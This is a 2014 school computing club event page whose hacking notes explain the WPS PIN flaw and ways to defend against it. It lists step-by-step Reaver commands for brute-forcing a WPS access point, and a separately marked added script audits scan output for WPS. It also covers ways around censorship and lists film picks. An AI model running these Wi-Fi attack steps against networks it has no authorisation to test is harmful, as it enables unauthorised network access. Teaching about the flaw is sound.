From GIS CS4



  • Saturday 17th May 2014
  • From 17:00 (5pm) onwards (soft start) - come earlier or later as you wish.

Suggest we plan to start watching the chosen film at around 19:00 (7pm) so that we can be finished around 9pm (21:00).

People are free to come/go when they like.


The Oliver's house

We will be providing Pizza and Icecream!


The tasks for the evening:


If you have the following that you are permitted to bring, then please do:

  • Laptop (preferably MS Windows) - we will NOT be changing the existing installation
  • USB Memory Stick (suitable to be wiped)

If you do not have a laptop or USB Memory stick, not to worry - let us know.

Hacking Notes

Creating Bootable USB Memory Stick

Ubuntu Only USB

Multiboot USB

Running Ubuntu Linux on existing Windows computer without changing anything

Basic Linux/Unix commands


Hacking Wireless WPS Access Point using Reaver

What is WPS?

Wi-Fi Protected Setup, or WPS, is a computing standard that attempts to allow easy establishment of a secure wireless home network.

The idea is to quickly allow a WiFi device such as a laptop or smartphone to connect to a WiFi Access Point without having to remember the lengthy WiFi WPA encryption key.

For more information, see Wikipedia page on WPS.

What is wrong with WPS?

In December 2011 researcher Stefan Viehböck reported a design and implementation flaw that makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. A successful attack on WPS allows unauthorized parties to gain access to the network. The only effective workaround is to disable WPS.

For more details, see WPS Security Problem.

How can I defend myself from this WPS vulnerability?

All you need to do is disable the WPS feature.

By default all WiFi routers have to have WPS enabled - this is a requirement for their WiFi license.

Apple's Airport Extreme/Express has WPS disabled by default.

At the time of writing, pretty much ALL Cisco/Linksys WiFi routers/access points could not have their WPS feature disabled - a bug in all their firmwares. Even when the WPS option is disabled, the WPS functionality is still enabled.

Some Cisco/Linksys WiFi routers cannot have their WiFi turned off properly either!

If you have a Cisco/Linksys or similarly affected device, you have the following options:

  • buy a new WiFi router
  • turn off WiFi functionality - optionally buy a new WiFi access point to provide that functionality (Apple Airport Express/Extremes are good)
  • configure the Cisco/Linksys's WiFi to use an out-of-band frequency channel (13/14), turn off SSID broadcasting, enable MAC address filtering, set a very strong WPA password, etc etc... and then buy yourself a new WiFi access point to provide WiFi functionality
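
Because some firmware keeps WPS running even after the option is switched off, it is worth checking what your own access point actually advertises after you change the setting. The following is an added example, not part of the original page: it assumes the text layout printed by `iw dev <iface> scan`, and the sample scan and its MAC addresses are constructed.

```shell
#!/bin/sh
# Added example: list which access points in a scan still advertise WPS.
# Assumption: input looks like `iw dev <iface> scan` output, i.e.
# "BSS <mac>(on <iface>)", "SSID: <name>", and a "WPS:" block whose
# attribute lines include "AP setup locked: 0x01" when the AP has locked WPS.

# wps_audit: read scan text on stdin, print one line per AP:
#   <bssid> <ssid> WPS=<on|off> LOCKED=<yes|no|->
wps_audit() {
    awk '
    function emit() {
        if (bssid != "")
            printf "%s %s WPS=%s LOCKED=%s\n", bssid, ssid, wps,
                   (wps == "on" ? locked : "-")
    }
    /^BSS / {                      # start of a new access point record
        emit()
        bssid = $2; sub(/\(.*/, "", bssid)
        ssid = "<hidden>"; wps = "off"; locked = "no"
        next
    }
    /^[ \t]*SSID: / { s = $0; sub(/^[ \t]*SSID: /, "", s)
                      if (s != "") ssid = s; next }
    /^[ \t]*WPS:/   { wps = "on"; next }   # WPS information element present
    /AP setup locked: 0x01/ { locked = "yes" }
    END { emit() }
    '
}

# Constructed sample scan (not captured from a real network).
sample_scan() {
    cat <<'EOF'
BSS 02:00:00:00:00:01(on wlan0)
	SSID: lab-ap-wps
	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
BSS 02:00:00:00:00:02(on wlan0)
	SSID: lab-ap-locked
	WPS:	 * Version: 1.0
		 * AP setup locked: 0x01
BSS 02:00:00:00:00:03(on wlan0)
	SSID: lab-ap-clean
	RSN:	 * Version: 1
EOF
}

# Offline demo; on a real system: iw dev wlan0 scan | wps_audit
sample_scan | wps_audit
```

If your own access point still shows `WPS=on` after you have disabled WPS in its settings, treat it as one of the affected devices described above.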

How easy is it to Brute-Force attack WPS

Very Easy...

See this YouTube video for details

All you need is to download and install Ubuntu Linux, then download and run the Reaver Attack Tool.

Step-by-step instructions

It typically takes 4-10 hours to obtain the WPA password.

  • Download Kali Linux
  • Create bootable DVD or USB (YUMI USB Creator)
  • Boot Kali
  • apt-get install aircrack-ng (already installed in Kali)
  • apt-get install reaver (already installed in Kali)
  • iwconfig
  • airmon-ng start wlan0
  • airodump-ng mon0
  • reaver -i mon0 -b C8:3A:35:30:E5:B8 -vv --pin=32045369

Note that, to save time, the above 'reaver' command pre-starts the scan from the actual PIN - otherwise it would take some 6 hours to complete...

Is it legal to attempt to Brute-Force attack somebody else's WPS enabled WiFi?


However you might like to tell them about the vulnerability. If they are willing, you could demonstrate how easily it can be done by running the above Reaver Attack Tool.

Censorship Circumvention

DNS Poisoning

DNS - Wiki

ISPs/countries attempt to stop access to a particular website by poisoning their DNS. For example, Turkey.

For example, if a web browser wishes to access '', instead of returning the correct IP address (, it returns a fake or government IP address.

DNS Poisoning Circumvention

The solution is to use alternative 'good' DNS servers - for example, OpenDNS.

Recommend using DNSCrypt.

IP Address Blocking

DNS Poisoning is very easy to circumvent.

The next level is to block access to specific IP addresses. For example, Great Firewall of China, or corporate/company/school firewalls.

Part of the function of the firewall is to perform:

  • URL monitoring (where users are visiting)
  • Content monitoring (what text/images users are seeing/sending)
  • Deep Packet Analysis (detect what circumvention mechanism users are trying/using)

Note that the same technology used to stop inappropriate web access within schools is used by governments to stop human rights/etc groups and control media access.

VPN - Virtual Private Network

VPN - Wiki

'It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network.'

ISPs/governments can see that the user (i.e. you) is connected to some remote VPN service. They can determine the amount of data being sent/received, but cannot directly know the data contents. However, researchers have been able to determine message content by analysing the encrypted data length.

Note that depending on the user's computer configuration or VPN setup, it is very possible for the computer to leak information about what websites the user is accessing. That might be sufficient for authorities to issue arrest warrants.

TOR - The Onion Router

TOR - Wiki

TOR - The Onion Router

The Amnesia Incognito Live System

How Governments Have Tried To Block TOR

Dealing With A Dead Computer

What Film Should We Watch

By popular demand (50% in class vote), we will be watching:

'War Games' (1983) - 1'53

Wiki information Trailer

Other Films We Considered

'Tron' (1982) - 1'30

Wiki information Trailer

'Tron: Legacy' (2010) - 2'05

Wiki information Trailer

'Short Circuit' (1986) - 1'38

Wiki information Trailer

Doctor Who: 'The Bells of Saint John' (2013 - S07E06) - 0'45

Wiki information Trailer

BBC: Code Breakers: Bletchley Park's Lost Heroes - 0'59

information + trailer